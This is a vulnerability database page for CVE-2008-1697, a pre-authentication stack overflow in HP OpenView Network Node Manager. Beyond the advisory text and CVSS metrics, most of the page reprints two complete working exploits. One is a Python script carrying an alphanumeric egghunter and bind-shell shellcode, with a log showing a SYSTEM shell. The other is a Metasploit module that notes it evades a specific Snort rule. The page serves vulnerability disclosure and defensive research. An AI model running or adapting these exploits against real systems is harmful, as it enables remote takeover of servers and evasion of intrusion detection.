CVE-2008-1697 : Detail


Overflow
93.42% (V3)
Network
Published: 2008-04-08 15h00 +00:00
Updated: 2017-09-28 10h57 +00:00

CVE Description

Stack-based buffer overflow in ovwparser.dll in HP OpenView Network Node Manager (OV NNM) 7.53, 7.51, and earlier allows remote attackers to execute arbitrary code via a long URI in an HTTP request processed by ovas.exe, as demonstrated by a certain topology/homeBaseView request. NOTE: some of these details are obtained from third party information.

CVE Information

Related Weaknesses

CWE-ID: CWE-119
Weakness Name: Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics: CVSS V2
Score: 10
CVSS Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Source: nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 5342

Publication date : 2008-04-01 22h00 +00:00
Author : muts
EDB Verified : Yes

#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
#################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\>whoami
# whoami
# nt authority\system
#
# C:\>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP" method.
################################################################################
# crash = "T"*1300
#
#################################################################################
# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
#################################################################################
# Case 1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################

import socket
import os
import sys

print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"

# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.
egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")

alignstack="\x90"*34+"\x83\xc4\x03"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.
bindshell=("T00WT00W" + alignstack +
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

# 0x6d356c6e pop pop ret somewhere in NNM 7.5.1
evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter + "A"*100 + ":7510"

buffer="GET http://" + evilcrash + "/topology/homeBaseView HTTP/1.1\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
buffer+= bindshell

print "[*] Sending evil HTTP request to NNMz, ph33r"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()
print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."

# milw0rm.com [2008-04-02]
Exploit Database EDB-ID : 16774

Publication date : 2010-10-11 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: hp_nnm_ovas.rb 10660 2010-10-12 18:39:21Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to at least bypass this rule
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP OpenView Network Node Manager
				versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to
				properly handle user supplied input within the HTTP request including headers and the
				actual URL GET request.

					Exploitation is tricky due to character restrictions. It was necessary to utilize a
				egghunter shellcode which was alphanumeric encoded by muts in the original exploit.

					If you plan on using exploit this for a remote shell, you will likely want to migrate
				to a different process as soon as possible. Any connections get reset after a short
				period of time. This is probably some timeout handling code that causes this.
			},
			'Author'         =>
				[
					'bannedit',
					# muts wrote the original exploit and did most of the initial work
					# credit where credit is due. =)
					'muts'
				],
			'Version'        => '$Revision: 10660 $',
			'References'     =>
				[
					[ 'CVE', '2008-1697' ],
					[ 'OSVDB', '43992' ],
					[ 'BID', '28569' ],
				],
			'DefaultOptions' =>
				{
					'WfsDelay'             => 45,
					'EXITFUNC'             => 'thread',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'           => 1000,
					'BadChars'        => "\x0a\x0d\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Targets'        =>
				[
					# need more but this will likely cover most cases
					[ 'Automatic Targeting', { 'auto' => true } ],
					[ 'Windows 2003/zip.dll OpenView 7.53',
						{
							'Ret' => 0x6d633757 # pop pop ret
						}
					],
					[ 'Windows 2000/jvm.dll OpenView NNM 7.51',
						{
							'Ret' => 0x6d356c6e # pop pop ret
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 02 2008'))

		register_options(
			[
				Opt::RPORT(7510),
				OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
			], self.class)
	end

	def exploit
		targ = target

		if (target['auto'])
			print_status("Detecting the remote version...")
			resp = send_request_raw({'uri' => '/topology/home'}, 5)
			if resp.nil?
				print_status("No response to request")
				return Exploit::CheckCode::Safe
			end

			case resp.body
			when /NNM Release B.07.53/
				targ = targets[1]
			when /NNM Release B.07.51/
				targ = targets[2]
			else
				raise RuntimeError, "Unable to determine a target automatically..."
				# if snmp is running you could set the target based on community strings
			end
		end

		print_status("Using target: #{targ.name}")
		exploit_target(targ)
	end

	def exploit_target(targ)
		# we have to use an egghunter in this case because of the restrictions
		# on the characters we can use.
		# we are using skape's egghunter alpha numeric encoded by muts
		egghunter = '%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+
			'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+
			'21*-q!au-q!au-oGSePAA%JMNU%521*-D'+
			'A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1'+
			'z1E-oRHEPAA%JMNU%521*-3s1--331--^'+
			'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+
			'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+
			'U%521*-1-wD-1-wD-8$GwP'

		print_status("Constructing the malformed http request")
		buf = "http://"
		buf << "\xeb" * 1101  # this gets mangled in such a way we can use less input
		buf << "\x41" * 4     # sometimes less really is more
		buf << "\x77\x21"     # \xeb is restricted so we use a conditional jump which is always taken
		buf << [targ.ret].pack('V')
		buf << "G" * 32
		buf << egghunter
		buf << "\x41" * 100
		buf << ":#{datastore['RPORT']}"

		# T00W is the egg
		payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded

		begin
			connect
			resp = send_request_raw({
				'uri'     => buf + "/topology/home",
				'version' => '1.1',
				'method'  => 'GET',
				'headers' =>
				{
					'Content-Type' => 'application/x-www-form-urlencoded',
					'User-Agent'   => datastore['UserAgent'],
				},
				'data' => payload_buf
			})
		rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
			# do nothing let the exploit live this catches the
			# connection reset by peer error which is expected
		end

		if not resp.nil?
			raise RuntimeError, "The server responded, that wasn't supposed to happen!"
		end

		print_status("Malformed http request sent.")
		print_status("Now we wait for the egg hunter to work it's magic. thx skape!")

		handler
		disconnect
	end

	def check
		resp = send_request_raw({'uri' => '/topology/home'}, 5)
		if resp.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe
		end

		if (resp.body =~ /NNM Release B.07.53/ ||
			resp.body =~ /NNM Release B.07.52/ ||
			resp.body =~ /NNM Release B.07.51/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end
end

Products Mentioned

Configuration 0

Hp >> Openview_network_node_manager >> Version up to (including) 7.53

Hp >> Openview_network_node_manager >> Version 7.0.1

Hp >> Openview_network_node_manager >> Version 7.51

References

http://marc.info/?l=bugtraq&m=121553626110871&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/29641
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019782
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/28569
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/5342
Tags : exploit, x_refsource_EXPLOIT-DB